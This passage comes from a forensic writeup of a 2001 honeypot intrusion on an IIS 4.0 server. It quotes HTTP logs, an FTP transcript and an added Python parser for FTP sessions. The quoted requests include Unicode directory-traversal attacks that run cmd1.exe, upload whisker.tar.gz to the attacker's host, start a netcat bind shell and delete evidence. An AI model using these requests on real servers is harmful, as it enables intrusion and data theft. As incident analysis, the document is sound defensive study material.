The next request for test.txt is not from Johna's Win2k box: the User-Agent is MSIE 5.0 on Windows 98 with Accept-Language en-gb, and it arrives through a NetCache proxy with X-Forwarded-For: 194.117.146.52.  Most likely Johna has told friends on IRC to check out the box.  This floods the snort log (which it has done) and makes it harder to sift through the data.

 

GET /test.txt HTTP/1.1

Host: lab.wiretrip.net

Connection: keep-alive

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

Via: 1.1 cache-haw (NetCache NetApp/5.0D13)

X-Forwarded-For: 194.117.146.52

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:37:06 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

Now here is another request from another box

 

GET /test.txt HTTP/1.0

User-Agent: Mozilla/4.7 [en] (Win98; I)

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

Via: 1.0 cache3.estpak.ee:8080 (Squid/2.3.STABLE3)

X-Forwarded-For: 213.168.4.30

Host: lab.wiretrip.net

Cache-Control: max-age=259200

Connection: keep-alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Connection: keep-alive

Date: Sun, 04 Feb 2001 13:37:15 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

Another request

 

GET /test.txt HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, */*

Accept-Language: nl

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:38:07 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

Another request

 

GET /test.txt HTTP/1.0

Connection: Keep-Alive

User-Agent: Mozilla/4.61 [en] (X11; I; Linux 2.2.16 i686)

Host: lab.wiretrip.net

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Connection: keep-alive

Date: Sun, 04 Feb 2001 13:38:51 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

Another request

 

GET /test.txt HTTP/1.0

Host: lab.wiretrip.net

Accept: text/html, text/plain, text/sgml, */*;q=0.01

Accept-Encoding: gzip, compress

Accept-Language: en

User-Agent: Lynx/2.8.3rel.1 libwww-FM/2.14

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:41:54 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

Another request, this time with Accept-Language set to French

GET /test.txt HTTP/1.1

Accept: */*

Accept-Language: fr

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:43:39 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

There is no way Johna has this many boxes.  The request times are very close together which makes me believe this is a coordinated effort.  I would bet that he has informed his friends on IRC.

 


Johna creates a new ftpcom file, like the one he created and deleted an hour earlier, except that this time he tells lab.wiretrip.net to upload c:\wiretrip\whisker.tar.gz to his own box at 213.116.251.162.

 

GET

/msadc/..À¯../..À¯../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom HTTP/1.1

 

Now he tells lab.wiretrip.net to run the FTP script; the upload (STOR) completes.

 

220--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

USER johna2k

331 User name okay, need password.

PASS haxedj00

230 User logged in, proceed.

PORT 172,16,1,106,12,87

200 PORT Command successful.

STOR whisker.tar.gz

150 Opening ASCII mode data connection for whisker.tar.gz.

226 Transfer complete.

QUIT

221 Buh bye, you secksi hax0r j00 :]
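As an added example (my code, not part of the original writeup), the following Python summarises the FTP control channels the honeypot opened outbound, as one would extract them from the snort log. It reports whether the login succeeded, where the PORT command sent the data connection (a,b,c,d,p1,p2 becomes a.b.c.d:p1*256+p2, which is the honeypot-side port to look for when pulling the transferred file out of the packet capture), and the fate of every RETR and STOR. The two transcripts embedded are copied from this Appendix (the failed nether.net login and the whisker upload, banner abridged).

```python
"""Added example (my code, not from the original writeup): summarise the FTP
control channel the honeypot opened outbound.  The two transcripts below are
copied from the Appendix of the writeup, banner lines abridged."""
import re

FAILED_LOGIN = """\
220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
PORT 172,16,1,106,12,64
530 Please login with USER and PASS.
RETR samdump.dll
530 Please login with USER and PASS.
RETR pdump.exe
530 Please login with USER and PASS.
RETR nc.exe
530 Please login with USER and PASS.
QUIT
221 Goodbye.
"""

WHISKER_UPLOAD = """\
220--------H-A-C-K  T-H-E  P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for whisker.tar.gz.
226 Transfer complete.
QUIT
221 Buh bye, you secksi hax0r j00 :]
"""

REPLY = re.compile(r"^(\d{3})[ -]")  # '220-' marks a multi-line banner


def parse_ftp_control(transcript: str) -> dict:
    """Walk the command/reply pairs and record what actually happened:
    whether the login succeeded, where the data connection was told to go
    (PORT a,b,c,d,p1,p2 -> a.b.c.d:p1*256+p2, the honeypot-side port to
    look for in the packet log), and the fate of each RETR/STOR."""
    session = {"user": None, "password": None, "logged_in": False,
               "data_endpoint": None, "transfers": []}
    current = None  # transfer waiting for its reply
    for line in transcript.splitlines():
        line = line.rstrip()
        if not line:
            continue
        m = REPLY.match(line)
        if m:
            code = m.group(1)
            if code == "230":
                session["logged_in"] = True
            if current is not None:
                if code == "150":
                    current["status"] = "opened"
                elif code == "226":
                    current["status"] = "complete"
                    current = None
                elif code[0] in "45":
                    current["status"] = "refused"
                    current = None
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            session["user"] = arg
        elif verb == "PASS":
            session["password"] = arg
        elif verb == "PORT":
            p = [int(x) for x in arg.split(",")]
            session["data_endpoint"] = (".".join(map(str, p[:4])), p[4] * 256 + p[5])
        elif verb in ("RETR", "STOR"):
            current = {"direction": "download" if verb == "RETR" else "upload",
                       "file": arg, "status": "pending"}
            session["transfers"].append(current)
    return session


def summarize(session: dict) -> list:
    """(direction, file, status) for each transfer attempted."""
    return [(t["direction"], t["file"], t["status"]) for t in session["transfers"]]


if __name__ == "__main__":
    for name, text in (("nether.net", FAILED_LOGIN), ("213.116.251.162", WHISKER_UPLOAD)):
        s = parse_ftp_control(text)
        print(name, "login ok" if s["logged_in"] else "login FAILED",
              s["data_endpoint"], summarize(s))
```

Run over the two sessions it shows the contrast the narrative describes: nether.net refuses the login and every RETR after it, while the session to 213.116.251.162 logs in, opens a data connection from 172.16.1.106:3159, and completes the STOR of whisker.tar.gz.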

 

 

 


It is worth noting that during the whisker upload somebody started another nc listener on the box.  The request carries the same MSIE 5.01/Hotbar 2.0 User-Agent and the same ASPSESSIONID cookie (LPGNFIPAECCHCHMAFOIKAOEB) as Johna's browser requests earlier, so it is most likely Johna restarting his shell, although with other people now aware of the holes this cannot be proven from the log alone.

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe

HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB

 


After whisker is uploaded, the ftpcom file is deleted via Unicode.  Why Unicode rather than the netcat shell?  Most likely because the listener (nc -l without -L) exits as soon as its single client disconnects, so every new shell has to be started with a fresh Unicode request anyway; for a one-off del, a direct Unicode request is quicker.

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+del+ftpcom HTTP/1.1

 

 

 

EOF